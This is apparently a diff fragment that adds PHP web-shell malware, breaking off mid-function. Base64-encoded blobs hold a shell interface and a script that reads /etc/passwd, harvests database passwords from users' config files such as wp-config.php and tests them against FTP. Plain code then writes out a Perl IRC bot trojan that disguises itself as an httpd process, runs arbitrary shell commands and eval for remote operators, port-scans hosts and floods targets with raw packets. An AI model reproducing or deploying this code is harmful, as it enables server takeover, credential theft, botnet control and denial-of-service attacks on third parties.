sgIjxpbWcgc3JjPSciK1grIic+PC9pbWc+IjsNCg0KfQ0KZnVuY3Rpb24gYnIoKXsNCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPGJyPiI7DQoNCn0NCjwvc2NyaXB0Pg0KPHRhYmxlIGJvcmRlcj0iMSIgYm9yZGVyY29sb3I9IiMwMDgwMDAiIGJvcmRlcmNvbG9yZGFyaz0iIzAwODAwMCINCmJvcmRlcmNvbG9ybGlnaHQ9IiMwMDgwMDAiPjx0aD48YSBvbmNsaWNrPSdyZXR1cm4gY2VudGVyKCknPkNlbnRlcjwvYT4gfHx8IDxhIG9uY2xpY2s9J3JldHVybiBsZWZ0KCknPkxlZnQ8L2E+IHx8fCA8YSBvbmNsaWNrPSdyZXR1cm4gcmlnaHQoKSc+cmlnaHQ8L2E+IHx8fCA8YSBvbmNsaWNrPSdyZXR1cm4gYigpJz5Cb2xkPC9hPiB8fHwgPGEgb25jbGljaz0ncmV0dXJuIHUoKSc+VW5kZXJMaW5lPC9hPiB8fHwgPGEgb25jbGljaz0ncmV0dXJuIGkoKSc+SXRhbGljPC9hPiB8fHwgPGEgb25jbGljaz0ncmV0dXJuIGJyKCknPk5ld0xpbmU8L2E+IHx8fCA8YSBvbmNsaWNrPSdyZXR1cm4gY29sb3VyKCknPkNvbG91cjwvYT4gfHx8IDxhIG9uY2xpY2s9J3JldHVybiBtYXIoKSc+TWFycXVlZSB8fHwgPGEgb25jbGljaz0ncmV0dXJuIGltZygpJz5QaWN0dXJlPC9hPiB8fHwgPGEgb25jbGljaz0ncmV0dXJuIGxpbmsoKSc+TGluazwvYT48L2E+PC90aD48dHI+PFREPg0KPGNlbnRlcj48Zm9ybSBuYW1lPSJpbmRleGZvcm0iIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiPjx0ZXh0YXJlYSBuYW1lPSdpbmRleCcgcm93cz0nMTQnIGNvbHM9Jzg2Jz48L3RleHRhcmVhPjwvcD4NCjwvZm9ybT48L2Zvcm0+PC9jZW50ZXI+DQo8L1REPjwvdHI+PHRyPjx0ZD5Db3B5IFRoZSBDb2RlIGFmdGVyIEZpbmlzaGluZyB5b3VyIGluZGV4PC90ZD48L3RyPjwvdGFibGU+DQo8Pw0KfQ0KPz4NCjxociBjb2xvcj0iIzAwRkYwMCIgLz4NCjx0YWJsZSBib3JkZXI9IjEiIGJnY29sb3I9IiMwMDAwMDAiIGJvcmRlcmNvbG9yPSJsaW1lIg0KYm9yZGVyY29sb3JkYXJrPSJsaW1lIiBib3JkZXJjb2xvcmxpZ2h0PSJsaW1lIj48dHI+PHRkPjxhIGhyZWY9Ij8iPk1haW4gU2hlbGw8L2E+PC90ZD48dGQ+PGEgaHJlZj0iP2FjdD11c2VycyI+TGlzdCBVc2VyczwvYT48L3RkPjx0ZD48YSBocmVmPSI/YWN0PWluZGV4Ij5JbmRleCBNYWtlcjwvYT48L3RkPjx0ZD48YSBocmVmPSI/YWN0PWNvbmZpZyI+UmVhZENvbmZpZzwvYT48L3RkPjwvdHI+PC90YWJsZT4NCjxwIGFsaWduPSJjZW50ZXIiPnd3dy5lZ3lzcGlkZXIuZXU8L3A+DQo8RElWIGlkPSJuIiBhbGlnbj0iY2VudGVyIj4NCiAgPFRBQkxFIGJvcmRlckNvbG9yPSIjMTExMTExIiBjZWxsU3BhY2luZz0iMCIgY2VsbFBhZGRpbmc9IjAiIHdpZHRoPSIxMDAlIiBib3JkZXI9IjEiPg0KICAgIDxUQk9EWT4NCiAgICAgIDxUUj4NCiAgICAgICAgPFREIHdpZHRoPSIxMDAlIj48cCBhbGlnbj0iY2VudGVyIj48U1RST05HPm8tLS1bIEVnWV9TcElkRXIgfCB8IDxBIGVneV9zcGlkZXJAaG90bWFpbC5jb20+ZWd5X3NwaWRlckBob3RtYWlsLmNvbTwvQT4gICBdLS0tbzwvU1RST05HPjwvcD48L1REPg0KICAgICAgPC9UUj4NCiAgICA8L1RCT0RZPg0KICA8L1RBQkxFPg0KPC9ESVY+DQo8L2NlbnRlcj4gDQogPC9ib2R5Pg0KPC9odG1sPg=";
+
+
+$egy_cp="PD9waHAgDQplY2hvICI8aHRtbD4iOyANCmVjaG8gIjx0aXRsZT5FZ1lfU3BJZEVyIFNoRWxMIDwvdGl0bGU+PFNUWUxFPg0KDQpCT0RZDQogew0KICAgICAgICBTQ1JPTExCQVItRkFDRS1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLUhJR0hMSUdIVC1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLVNIQURPVy1DT0xPUjogIzAwMDAwMDsgQ09MT1I6ICM2NjY2NjY7IFNDUk9MTEJBUi0zRExJR0hULUNPTE9SOiAjNzI2NDU2OyBTQ1JPTExCQVItQVJST1ctQ09MT1I6ICM3MjY0NTY7IFNDUk9MTEJBUi1UUkFDSy1DT0xPUjogIzI5MjkyOTsgRk9OVC1GQU1JTFk6IFZlcmRhbmE7IFNDUk9MTEJBUi1EQVJLU0hBRE9XLUNPTE9SOiAjNzI2NDU2DQp9DQoNCi50ZDEgew0KQk9SREVSOiAxOw0KZm9udDogN3B0IHRhaG9tYTsNCmNvbG9yOiAjZmZmZmZmOw0KfQ0KDQoudHIxIHsNCkJPUkRFUjogMTsNCmNvbG9yOiAjMzMzMzMzOw0KfQ0KdGFibGUgew0KQk9SREVSOiAgI2VlZWVlZSAgb3V0c2V0Ow0KQkFDS0dST1VORC1DT0xPUjogIzAwMDAwMDsNCmNvbG9yOiAjMzMzMzMzOw0KfQ0KdGV4dGFyZWEgew0KQk9SREVSLVJJR0hUOiAgI2ZmZmZmZiAxIHNvbGlkOw0KQk9SREVSLVRPUDogICAgIzk5OTk5OSAxIHNvbGlkOw0KQk9SREVSLUxFRlQ6ICAgIzk5OTk5OSAxIHNvbGlkOw0KQk9SREVSLUJPVFRPTTogI2ZmZmZmZiAxIHNvbGlkOw0KQkFDS0dST1VORC1DT0xPUjogIzMzMzMzMzsNCmZvbnQ6IEZpeGVkc3lzIGJvbGQ7DQpjb2xvcjogI2ZmZmZmZjsNCn0NCkJPRFkgew0KbWFyZ2luOiAxOw0KY29sb3I6ICMzMzMzMzM7DQpiYWNrZ3JvdW5kLWNvbG9yOiAjMDAwMDAwOw0KfQ0KQTpsaW5rIHtDT0xPUjpyZWQ7IFRFWFQtREVDT1JBVElPTjogbm9uZX0NCkE6dmlzaXRlZCB7IENPTE9SOnJlZDsgVEVYVC1ERUNPUkFUSU9OOiBub25lfQ0KQTphY3RpdmUge0NPTE9SOnJlZDsgVEVYVC1ERUNPUkFUSU9OOiBub25lfQ0KQTpob3ZlciB7Y29sb3I6Ymx1ZTtURVhULURFQ09SQVRJT046IG5vbmV9DQoNCjwvU1RZTEU+PGJvZHk+IjsgDQoNCnNldF90aW1lX2xpbWl0KDApOyANCiMjIyMjIyMjIyMjIyMjIyMjIyANCkAkcGFzc3dkPWZvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKTsgDQppZiAoISRwYXNzd2QpIHsgDQogIGVjaG8gIlstXSBFcnJvciA6IGNvdWRuJ3QgcmVhZCAvZXRjL3Bhc3N3ZCI7IA0KICBleGl0OyANCn0gDQokcGF0aF90b19wdWJsaWM9YXJyYXkoKTsgDQokdXNlcnM9YXJyYXkoKTsgDQokcGF0aHRvY29uZj1hcnJheSgpOyANCiRpPTA7IA0KDQp3aGlsZSghZmVvZigkcGFzc3dkKSkgeyANCiRzdHI9ZmdldHMoJHBhc3N3ZCk7IA0KaWYgKCRpPjM1KSB7IA0KICAgJHBvcz1zdHJwb3MoJHN0ciwiOiIpOyANCiAgICR1c2VybmFtZT1zdWJzdHIoJHN0ciwwLCRwb3MpOyANCiAgICRkaXJ6PSIvaG9tZS8kdXNlcm5hbWUvcHVibGljX2h0bWwvIjsgDQogICBpZiAoKCR1c2VybmFtZSE9IiIpKSB7IA0KICAgICAgIGlmIChpc19yZWFkYWJsZSgkZGlyeikpIHsgDQogICAgICAgICAgIGFycmF5X3B1c2goJHVzZXJzLCR1c2VybmFtZSk7IA0KICAgICAgICAgICBhcnJheV9wdXNoKCRwYXRoX3RvX3B1YmxpYywkZGlyeik7IA0KICAgICAgIH0gDQogICB9IA0KfSANCiRpKys7IA0KfSANCiMjIyMjIyMjIyMjIyMjIyMjIyMgDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgDQplY2hvICI8YnI+PGJyPiI7IA0KZWNobyAiPHRleHRhcmVhIG5hbWU9J21haW5fd2luZG93JyBjb2xzPTEwMCByb3dzPTIwPiI7IA0KDQplY2hvICJbK10gRm91bmRlZCAiLnNpemVvZigkdXNlcnMpLiIgZW50cnlzIGluIC9ldGMvcGFzc3dkXG4iOyANCmVjaG8gIlsrXSBGb3VuZGVkICIuc2l6ZW9mKCRwYXRoX3RvX3B1YmxpYykuIiByZWFkYWJsZSBwdWJsaWNfaHRtbCBkaXJlY3Rvcmllc1xuIjsgDQoNCmVjaG8gIlt+XSBTZWFyY2hpbmcgZm9yIHBhc3N3b3JkcyBpbiBjb25maWcuKiBmaWxlcy4uLlxuXG4iOyANCmZvcmVhY2ggKCR1c2VycyBhcyAkdXNlcikgeyANCiAgICAgICAkcGF0aD0iL2hvbWUvJHVzZXIvcHVibGljX2h0bWwvIjsgDQogICAgICAgcmVhZF9kaXIoJHBhdGgsJHVzZXIpOyANCn0gDQoNCmVjaG8gIlxuWytdIERvbmVcbiI7IA0KDQpmdW5jdGlvbiByZWFkX2RpcigkcGF0aCwkdXNlcm5hbWUpIHsgDQogICBpZiAoJGhhbmRsZSA9IG9wZW5kaXIoJHBhdGgpKSB7IA0KICAgICAgIHdoaWxlIChmYWxzZSAhPT0gKCRmaWxlID0gcmVhZGRpcigkaGFuZGxlKSkpIHsgDQogICAgICAgICAgICAgJGZwYXRoPSIkcGF0aCRmaWxlIjsgDQogICAgICAgICAgICAgaWYgKCgkZmlsZSE9Jy4nKSBhbmQgKCRmaWxlIT0nLi4nKSkgeyANCiAgICAgICAgICAgICAgICBpZiAoaXNfcmVhZGFibGUoJGZwYXRoKSkgeyANCiAgICAgICAgICAgICAgICAgICAkZHI9IiRmcGF0aC8iOyANCiAgICAgICAgICAgICAgICAgICBpZiAoaXNfZGlyKCRkcikpIHsgDQogICAgICAgICAgICAgICAgICAgICAgcmVhZF9kaXIoJGRyLCR1c2VybmFtZSk7IA0KICAgICAgICAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgZWxzZSB7IA0KICAgICAgICAgICAgICAgICAgICAgICAgaWYgKCgkZmlsZT09J2NvbmZpZy5waHAnKSBvciAoJGZpbGU9PSdjb25maWcuaW5jLnBocCcpIG9yICgkZmlsZT09J2RiLmluYy5waHAnKSBvciAoJGZpbGU9PSdjb25uZWN0LnBocCcpIG9yICgkZmlsZT09J3dwLWNvbmZpZy5waHAnKSBvciAoJGZpbGU9PSd2YXIucGhwJykgb3IgKCRmaWxlPT0nY29uZmlndXJlLnBocCcpIG9yICgkZmlsZT09J2RiLnBocCcpIG9yICgkZmlsZT09J2RiX2Nvbm5lY3QucGhwJykpIHsgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAkcGFzcz1nZXRfcGFzcygkZnBhdGgpOyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkcGFzcyE9JycpIHsgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlY2hvICJbK10gJGZwYXRoXG4kcGFzc1xuIjsgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmdHBfY2hlY2soJHVzZXJuYW1lLCRwYXNzKTsgDQogICAgICAgICAgICAgICAgICAgICAgICAgICB9IA0KICAgICAgICAgICAgICAgICAgICAgICAgfSANCiAgICAgICAgICAgICAgICAgICB9IA0KICAgICAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgfSANCiAgICAgICB9IA0KICAgfSANCn0gDQoNCmZ1bmN0aW9uIGdldF9wYXNzKCRsaW5rKSB7IA0KICAgQCRjb25maWc9Zm9wZW4oJGxpbmssJ3InKTsgDQogICB3aGlsZSghZmVvZigkY29uZmlnKSkgeyANCiAgICAgICAkbGluZT1mZ2V0cygkY29uZmlnKTsgDQogICAgICAgaWYgKHN0cnN0cigkbGluZSwncGFzcycpIG9yIHN0cnN0cigkbGluZSwncGFzc3dvcmQnKSBvciBzdHJzdHIoJGxpbmUsJ3Bhc3N3ZCcpKSB7IA0KICAgICAgICAgICBpZiAoc3RycnBvcygkbGluZSwnIicpKSANCiAgICAgICAgICAgICAgJHBhc3M9c3Vic3RyKCRsaW5lLChzdHJwb3MoJGxpbmUsJz0nKSszKSwoc3RycnBvcygkbGluZSwnIicpLShzdHJwb3MoJGxpbmUsJz0nKSszKSkpOyANCiAgICAgICAgICAgZWxzZSANCiAgICAgICAgICAgICAgJHBhc3M9c3Vic3RyKCRsaW5lLChzdHJwb3MoJGxpbmUsJz0nKSszKSwoc3RycnBvcygkbGluZSwiJyIpLShzdHJwb3MoJGxpbmUsJz0nKSszKSkpOyANCiAgICAgICAgICAgcmV0dXJuICRwYXNzOyANCiAgICAgICB9IA0KICAgfSANCn0gDQoNCmZ1bmN0aW9uIGZ0cF9jaGVjaygkbG9naW4sJHBhc3MpIHsgDQogICAgQCRmdHA9ZnRwX2Nvbm5lY3QoJzEyNy4wLjAuMScpOyANCiAgICBpZiAoJGZ0cCkgeyANCiAgICAgICBAJHJlcz1mdHBfbG9naW4oJGZ0cCwkbG9naW4sJHBhc3MpOyANCiAgICAgICBpZiAoJHJlcykgeyANCiAgICAgICAgICBlY2hvICdbRlRQXSAnLiRsb2dpbi4nOicuJHBhc3MuIiAgU3VjY2Vzc1xuIjsgDQogICAgICAgfSANCiAgICAgICBlbHNlIGZ0cF9xdWl0KCRmdHApOyANCiAgICB9IA0KfSANCg0KZWNobyAiPC90ZXh0YXJlYT48YnI+IjsgDQoNCmVjaG8gIjwvYm9keT48L2h0bWw+IjsgDQo/Pg=";
+
+
+
+
+if(!empty($_POST['ircadmin']) AND !empty($_POST['ircserver']) AND !empty($_POST['ircchanal']) AND !empty($_POST['ircname']))
+{
+$ircadmin=$_POST['ircadmin'];
+$ircserver=$_POST['ircserver'];
+$ircchan=$_POST['ircchanal'];
+$irclabel=$_POST['ircname'];
+echo "<title>OverclockiX Shell-Connector || Connecting to $ircserver<title>";
+echo "<body bgcolor=\"black\" text=\"green\">";
+echo "Now Connecting to <b><font color=\"red\">$ircserver</font></b> in <b><font color=\"yellow\">$ircchan</font></b> Andministrators: <b><font color=\"yellow\">$ircadmin</font></b> Botname is <b><font color=\"yellow\">$irclabel</font></b>";
+echo "<p>Dont Forget to Delete Loader.pl in /tmp</p>";
+#######################################################
+######################IRC Trojan##########################
+$file="
+################ CONFIGURACAO #################################################################
+my \$processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
+#----------------------------------------------################################################
+my \$linas_max='48'; # Evita o flood :) depois de X linhas #
+#----------------------------------------------################################################
+my \$sleep='4'; # ele dorme X segundos #
+##################### IRC #####################################################################
+my @adms=(\"$ircadmin\"); # Nick do administrador #
+#----------------------------------------------################################################
+my @canais=(\"$ircchan\"); # Caso haja senha (\"#canal :senha\") #
+#----------------------------------------------################################################
+my \$nick='$irclabel'; # Nick do bot. Caso esteja em uso vai aparecer #
+                                               # aparecer com numero radonamico no final #
+#----------------------------------------------################################################
+my \$ircname = 'Linux'; # User ID #
+#----------------------------------------------################################################
+chop (my \$realname = `uname -a`); # Full Name #
+#----------------------------------------------################################################
+\$servidor='$ircserver' unless \$servidor; # Servidor de irc que vai ser usado #
+                                               # caso n?o seja especificado no argumento #
+#----------------------------------------------################################################
+my \$porta='6667'; # Porta do servidor de irc #
+################ ACESSO A SHELL ###############################################################
+my \$secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
+###############################################################################################
+my \$VERSAO = '0.2';
+\$SIG{'INT'} = 'IGNORE';
+\$SIG{'HUP'} = 'IGNORE';
+\$SIG{'TERM'} = 'IGNORE';
+\$SIG{'CHLD'} = 'IGNORE';
+\$SIG{'PS'} = 'IGNORE';
+\$SIG{'STOP'} = 'IGNORE';
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir(\"/\");
+\$servidor=\"\$ARGV[0]\" if \$ARGV[0];
+$0=\"\$processo\".\"\0\"x16;;
+my \$pid=fork;
+exit if \$pid;
+die \"Problema com o fork: $!\" unless defined(\$pid);
+my \$dcc_sel = new IO::Select->new();
+#############################
+# B0tchZ na veia ehehe :P #
+#############################
+
+
+\$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my \$socket = \$_[0];
+    print \$socket \"\$_[1]\\n\";
+  } else {
+      print \$IRC_cur_socket \"\$_[0]\\n\";
+  }
+}
+#################################
+sub conectar {
+   my \$meunick = \$_[0];
+   my \$servidor_con = \$_[1];
+   my \$porta_con = \$_[2];
+
+
+   my \$IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"\$servidor_con\", PeerPort=>\$porta_con) or return(1);
+   if (defined(\$IRC_socket)) {
+     \$IRC_cur_socket = \$IRC_socket;
+
+
+     \$IRC_socket->autoflush(1);
+     \$sel_cliente->add(\$IRC_socket);
+
+
+     \$irc_servers{\$IRC_cur_socket}{'host'} = \"\$servidor_con\";
+     \$irc_servers{\$IRC_cur_socket}{'porta'} = \"\$porta_con\";
+     \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
+     \$irc_servers{\$IRC_cur_socket}{'meuip'} = \$IRC_socket->sockhost;
+     nick(\"\$meunick\");
+     sendraw(\"USER \$ircname \".\$IRC_socket->sockhost.\" \$servidor_con :\$realname\");
+     sleep 1;
+   }
+} #####################
+
+
+my \$line_temp;
+while( 1 ) {
+   while (!(keys(%irc_servers))) { conectar(\"\$nick\", \"\$servidor\", \"\$porta\"); }
+   delete(\$irc_servers{''}) if (defined(\$irc_servers{''}));
+   &DCC::connections;
+   my @ready = \$sel_cliente->can_read(0);
+   next unless(@ready);
+   foreach \$fh (@ready) {
+     \$IRC_cur_socket = \$fh;
+     \$meunick = \$irc_servers{\$IRC_cur_socket}{'nick'};
+     \$nread = sysread(\$fh, \$msg, 4096);
+     if (\$nread == 0) {
+        \$sel_cliente->remove(\$fh);
+        \$fh->close;
+        delete(\$irc_servers{\$fh});
+     }
+     @lines = split (/\\n/, \$msg);
+
+
+     for(my \$c=0; \$c<= $#lines; \$c++) {
+       \$line = \$lines[\$c];
+       \$line=\$line_temp.\$line if (\$line_temp);
+       \$line_temp='';
+       \$line =~ s/\\r$//;
+       unless (\$c == $#lines) {
+         parse(\"\$line\");
+       } else {
+           if ($#lines == 0) {
+             parse(\"\$line\");
+           } elsif (\$lines[\$c] =~ /\\r$/) {
+               parse(\"\$line\");
+           } elsif (\$line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+               parse(\"\$line\");
+           } else {
+               \$line_temp = \$line;
+           }
+       }
+      }
+   }
+}
+
+
+#########################
+
+
+
+
+sub parse {
+   my \$servarg = shift;
+   if (\$servarg =~ /^PING \:(.*)/) {
+     sendraw(\"PONG :$1\");
+   } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+       my \$pn=$1; my \$onde = $4; my \$args = $5;
+       if (\$args =~ /^\\001VERSION\\001$/) {
+         notice(\"\$pn\", \"\\001VERSION ShellBOT-\$VERSAO por 0ldW0lf\\001\");
+       }
+       if (grep {\$_ =~ /^\Q\$pn\E$/i } @adms) {
+         if (\$onde eq \"\$meunick\"){
+           shell(\"\$pn\", \"\$args\");
+         }
+         if (\$args =~ /^(\Q\$meunick\E|\!atrix)\s+(.*)/ ) {
+            my \$natrix = $1;
+            my \$arg = $2;
+            if (\$arg =~ /^\!(.*)/) {
+              ircase(\"\$pn\",\"\$onde\",\"\$1\") unless (\$natrix eq \"!atrix\" and \$arg =~ /^\!nick/);
+            } elsif (\$arg =~ /^\@(.*)/) {
+                \$ondep = \$onde;
+                \$ondep = \$pn if \$onde eq \$meunick;
+                bfunc(\"\$ondep\",\"$1\");
+            } else {
+                shell(\"\$onde\", \"\$arg\");
+            }
+         }
+       }
+   } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+       if (lc($1) eq lc(\$meunick)) {
+         \$meunick=$4;
+         \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
+       }
+   } elsif (\$servarg =~ m/^\:(.+?)\s+433/i) {
+       nick(\"\$meunick\".int rand(9999));
+   } elsif (\$servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+       \$meunick = $2;
+       \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
+       \$irc_servers{\$IRC_cur_socket}{'nome'} = \"$1\";
+       foreach my \$canal (@canais) {
+         sendraw(\"JOIN \$canal\");
+       }
+   }
+}
+##########################
+
+
+sub bfunc {
+  my \$printl = \$_[0];
+  my \$funcarg = \$_[1];
+  if (my \$pid = fork) {
+     waitpid(\$pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           if (\$funcarg =~ /^portscan (.*)/) {
+             my \$hostip=\"$1\";
+             my @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\");
+             my (@aberta, %porta_banner);
+             foreach my \$porta (@portas) {
+                my \$scansock = IO::Socket::INET->new(PeerAddr => \$hostip, PeerPort => \$porta, Proto => 'tcp', Timeout => 4);
+                if (\$scansock) {
+                   push (@aberta, \$porta);
+                   \$scansock->close;
+                }
+             }
+
+
+             if (@aberta) {
+               sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :portas abertas: @aberta\");
+             } else {
+                 sendraw(\$IRC_cur_socket,\"PRIVMSG \$printl :Nenhuma porta aberta foi encontrada\");
+             }
+           }
+           if (\$funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
+             my (\$dtime, %pacotes) = attacker(\"$1\", \"$2\", \"$3\");
+             \$dtime = 1 if \$dtime == 0;
+             my %bytes;
+             \$bytes{igmp} = $2 * \$pacotes{igmp};
+             \$bytes{icmp} = $2 * \$pacotes{icmp};
+             \$bytes{o} = $2 * \$pacotes{o};
+             \$bytes{udp} = $2 * \$pacotes{udp};
+             \$bytes{tcp} = $2 * \$pacotes{tcp};
+
+
+             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002 - Status GERAL -\\002\");
+             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Tempo\\002: \$dtime\".\"s\");
+             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total pacotes\\002: \".(\$pacotes{udp} + \$pacotes{igmp} + \$pacotes{icmp} + \$pacotes{o}));
+             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total bytes\\002: \".(\$bytes{icmp} + \$bytes {igmp} + \$bytes{udp} + \$bytes{o}));
+             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Media de envio\\002: \".int(((\$bytes{icmp}+\$bytes{igmp}+\$bytes{udp} + \$bytes{o})/1024)/\$dtime).\" kbps\");
+
+
+           }
+           exit;
+       }
+  }
+}
+##########################
+
+
+
+
+sub ircase {
+  my (\$kem, \$printl, \$case) = @_;
+
+
+
+
+  if (\$case =~ /^join (.*)/) {
+     j(\"$1\");
+   }
+   if (\$case =~ /^part (.*)/) {
+      p(\"$1\");
+   }
+   if (\$case =~ /^rejoin\s+(.*)/) {
+      my \$chan = $1;
+      if (\$chan =~ /^(\d+) (.*)/) {
+        for (my \$ca = 1; \$ca <= $1; \$ca++ ) {
+          p(\"$2\");
+          j(\"$2\");
+        }
+      } else {
+          p(\"\$chan\");
+          j(\"\$chan\");
+      }
+   }
+   if (\$case =~ /^op/) {
+      op(\"\$printl\", \"\$kem\") if \$case eq \"op\";
+      my \$oarg = substr(\$case, 3);
+      op(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if (\$case =~ /^deop/) {
+      deop(\"\$printl\", \"\$kem\") if \$case eq \"deop\";
+      my \$oarg = substr(\$case, 5);
+      deop(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if (\$case =~ /^voice/) {
+      voice(\"\$printl\", \"\$kem\") if \$case eq \"voice\";
+      \$oarg = substr(\$case, 6);
+      voice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if (\$case =~ /^devoice/) {
+      devoice(\"\$printl\", \"\$kem\") if \$case eq \"devoice\";
+      \$oarg = substr(\$case, 8);
+      devoice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if (\$case =~ /^msg\s+(\S+) (.*)/) {
+      msg(\"$1\", \"$2\");
+   }
+   if (\$case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my \$cf = 1; \$cf <= $1; \$cf++) {
+        msg(\"$2\", \"$3\");
+      }
+   }
+   if (\$case =~ /^ctcp\s+(\S+) (.*)/) {
+      ctcp(\"$1\", \"$2\");
+   }
+   if (\$case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my \$cf = 1; \$cf <= $1; \$cf++) {
+        ctcp(\"$2\", \"$3\");
+      }
+   }
+   if (\$case =~ /^invite\s+(\S+) (.*)/) {
+      invite(\"$1\", \"$2\");
+   }
+   if (\$case =~ /^nick (.*)/) {
+      nick(\"$1\");
+   }
+   if (\$case =~ /^conecta\s+(\S+)\s+(\S+)/) {
+       conectar(\"$2\", \"$1\", 6667);
+   }
+   if (\$case =~ /^send\s+(\S+)\s+(\S+)/) {
+      DCC::SEND(\"$1\", \"$2\");
+   }
+   if (\$case =~ /^raw (.*)/) {
+      sendraw(\"$1\");
+   }
+   if (\$case =~ /^eval (.*)/) {
+     eval \"$1\";
+   }
+}
+##########################
+
+
+sub shell {
+  return unless \$secv;
+  my \$printl=\$_[0];
+  my \$comando=\$_[1];
+  if (\$comando =~ /cd (.*)/) {
+    chdir(\"$1\") || msg(\"\$printl\", \"Dossier Makayench :D \");
+    return;
+  }
+  elsif (\$pid = fork) {
+     waitpid(\$pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           my @resp=`\$comando 2>&1 3>&1`;
+           my \$c=0;
+           foreach my \$linha (@resp) {
+             \$c++;
+             chop \$linha;
+             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\$linha\");
+             if (\$c == \"\$linas_max\") {
+               \$c=0;
+               sleep \$sleep;
+             }
+           }
+           exit;
+       }
+  }
+}
+
+
+#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
+sub attacker {
+  my \$iaddr = inet_aton(\$_[0]);
+  my \$msg = 'B' x \$_[1];
+  my \$ftime = \$_[2];
+  my \$cp = 0;
+  my (%pacotes);
+  \$pacotes{icmp} = \$pacotes{igmp} = \$pacotes{udp} = \$pacotes{o} = \$pacotes{tcp} = 0;
+
+
+  socket(SOCK1, PF_INET, SOCK_RAW, 2) or \$cp++;
+  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or \$cp++;
+  socket(SOCK3, PF_INET, SOCK_RAW, 1) or \$cp++;
+  socket(SOCK4, PF_INET, SOCK_RAW, 6) or \$cp++;
+  return(undef) if \$cp == 4;
+  my \$itime = time;
+  my (\$cur_time);
+  while ( 1 ) {
+     for (my \$porta = 1; \$porta <= 65535; \$porta++) {
+       \$cur_time = time - \$itime;
+       last if \$cur_time >= \$ftime;
+       send(SOCK1, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{igmp}++;
+       send(SOCK2, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{udp}++;
+       send(SOCK3, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{icmp}++;
+       send(SOCK4, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{tcp}++;
+
+
+       # DoS ?? :P
+       for (my \$pc = 3; \$pc <= 255;\$pc++) {
+         next if \$pc == 6;
+         \$cur_time = time - \$itime;
+         last if \$cur_time >= \$ftime;
+         socket(SOCK5, PF_INET, SOCK_RAW, \$pc) or next;
+         send(SOCK5, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{o}++;;
+       }
+     }
+     last if \$cur_time >= \$ftime;
+  }
+  return(\$cur_time, %pacotes);
+}
+
+
+#############
+# ALIASES #
+#############
+
+
+sub action {
+   return unless $#_ == 1;
+   sendraw(\"PRIVMSG \$_[0] :\\001ACTION \$_[1]\\001\");
+}
+
+
+sub ctcp {
+   return unless $#_ == 1;
+   sendraw(\"PRIVMSG \$_[0] :\\001\$_[1]\\001\");
+}
+sub msg {
+   return unless $#_ == 1;
+   sendraw(\"PRIVMSG \$_[0] :\$_[1]\");
+}
+
+
+sub notice {
+   return unless $#_ == 1;
+   sendraw(\"NOTICE \$_[0] :\$_[1]\");
+}
+
+
+sub op {
+   return unless $#_ == 1;
+   sendraw(\"MODE \$_[0] +o \$_[1]\");
+}
+sub deop {
+   return unless $#_ == 1;
+   sendraw(\"MODE \$_[0] -o \$_[1]\");
+}
+sub hop {
+    return unless $#_ == 1;
+   sendraw(\"MODE \$_[0] +h \$_[1]\");
+}
+sub dehop {
+   return unless $#_ == 1;
+   sendraw(\"MODE \$_[0] +h \$_[1]\");
+}
+sub voice {
+   return unless $#_ == 1;
+   sendraw(\"MODE \$_[0] +v \$_[1]\");
+}
+sub devoice {
+   return unless $#_ == 1;
+   sendraw(\"MODE \$_[0] -v \$_[1]\");
+}
+sub ban {
